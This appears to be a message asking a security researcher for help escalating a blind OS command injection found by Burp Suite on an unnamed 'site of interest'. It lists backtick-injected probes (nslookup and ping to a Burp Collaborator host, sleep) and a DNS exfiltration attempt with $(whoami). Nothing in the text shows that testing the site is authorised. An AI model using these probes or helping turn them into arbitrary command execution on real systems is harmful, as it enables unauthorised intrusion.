Hello friend, I was reviewing your profile and I think you are the right person for the help I need.
A few days ago I found a vulnerability in a site of interest through the Burp Suite scanner, using the nslookup xxx.burpcolaborator.com exploit, with the following feature:

Issue: OS command injection
Severity: High
Confidence: Certain

The vulnerability only responds when using ` and only responds to nslookup, sleep and ping, including the Burp Collaborator.

![1](https://github.com/carlospolop/hacktricks/assets/8999363/feed197e-452c-4f41-a805-fba3f876b05e)

These are the only commands it responds to:
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
Other commands like
nslookup $(whoami).xxx.burp collaborator.com
do not give any answer. Please, I would appreciate it if you could help me with this problem, since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep. I await your response. Thanks